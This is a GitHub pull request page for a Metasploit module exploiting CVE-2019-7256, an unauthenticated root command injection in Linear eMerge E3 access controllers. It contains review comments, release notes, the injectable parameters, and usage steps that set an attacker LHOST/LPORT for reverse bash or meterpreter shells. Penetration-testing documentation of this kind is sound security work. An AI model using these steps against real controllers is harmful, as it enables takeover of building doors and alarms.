-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Pre-Authenticated Remote Code Execution in Nortek Linear eMerge Access Controller [CVE-2019-7256] #17312
Conversation
documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
Outdated
Show resolved
Hide resolved
Gents are we still moving on this module? |
@h00die-gr3y Sorry for the delay most of the team has been out on holiday and we also had end of the year tasks that kept us from getting to this. Will take a look at this today/tomorrow once I've finished reviewing another PR. |
documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
Outdated
Show resolved
Hide resolved
…alidation on server response.
4910f73
to
f39973d
Compare
Alright looks like everything should be good now. Also rebased to make sure there were no merge conflicts and to squash 2 commits down. Will land once tests pass. |
Woot all tests passed, will land this now. Thanks for your help and time on this PR @h00die-gr3y! |
Release NotesAn exploit has been added for CVE-2019-7256, an unauthenticated command injection vulnerability in Linear eMerge E3 versions |
Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation and personal safety systems and devices. The eMerge E3-Series is part of Linear’s access control platform, that delivers entry-level access control to buildings.
It is a web based application where the HTTP web interface is typically exposed to the public internet.
The Linear eMerge E3-Series with firmware versions
1.00-06
and below are vulnerable to an unauthenticated command injection remote root exploit that leverages card_scan_decoder.php.This can be exploited to inject and execute arbitrary shell commands as the root user through the
No
anddoor
HTTP GET parameter.A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.
Building automation and access control systems are at the heart of many critical infrastructures, and their security is vital.
Executing attacks on these systems may enable unauthenticated attackers to access and manipulate doors, elevators, air-conditioning systems, cameras, boilers, lights, safety alarm systems within a building.
This issue affects all Linear eMerge E3 versions up to and including
1.00-06
.Installing a vulnerable test bed requires a Linear eMerge E3-Series access controller with the vulnerable software loaded.
This module has been tested against a Linear eMerge access controller with the specifications listed below:
v1.00-03
Verification
use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
set RHOSTS <TARGET HOSTS>
set RPORT <port>
set LHOST <attacker host ip>
set LPORT <attacker host port>
set TARGET <0-Unix command or 1-Linux Dropper>
exploit
You should get a
bash
shell ormeterpreter
session depending on the target and payload settings.Options
No specific options.
Scenarios
Nortek Linear eMerge E3 Elite access controller bash reverse shell
Nortek Linear eMerge E3 Elite access controller meterpreter session
Limitations
Due to the limitations of restricted
busybox
command implementation on the Linear eMerge E3 Access Controller, only afew unix command payloads will work such as
cmd/unix/reverse_bash
orcmd/unix/reverse
(telnet).